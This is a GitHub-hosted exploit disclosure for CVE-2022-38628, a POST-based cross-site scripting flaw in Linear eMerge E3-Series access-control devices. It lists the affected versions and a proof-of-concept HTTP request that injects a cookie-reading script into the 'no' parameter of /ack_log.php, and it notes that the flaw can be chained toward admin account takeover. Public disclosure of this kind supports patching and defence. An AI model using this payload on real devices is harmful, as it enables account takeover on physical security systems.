-
Notifications
You must be signed in to change notification settings - Fork 21
/
Copy pathCVE-2022-38628.txt
24 lines (19 loc) · 970 Bytes
/
CVE-2022-38628.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# Exploit Title: Linear eMerge E3-Series devices are vulnerable to Post-Based-XSS via the "no" parameter
# Exploit Author: Omar Hashim
# Version: 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e
# Vendor home page: https://na.niceforyou.com/brands/linear/
# Vendor home page: https://www.nortekcontrol.com/access-control/
# Vendor home page: https://linear-solutions.com/
# Authentication Required: No
# CVE : CVE-2022-38628
# Description
====================
Linear eMerge E3-Series were discovered to contain a Post-Based XSS vulnerability via the "no" parameter that can be chained with the local session fixation to takeover admin or less privileged users accounts.
#Proof Of Concept:
====================
POST /ack_log.php HTTP/1.1
Host: Vulnerable-HOST:PORT
Cookie: PHPSESSID=t5a935jh5s8dd205f5s6sgr9a73cbf98
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
no=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E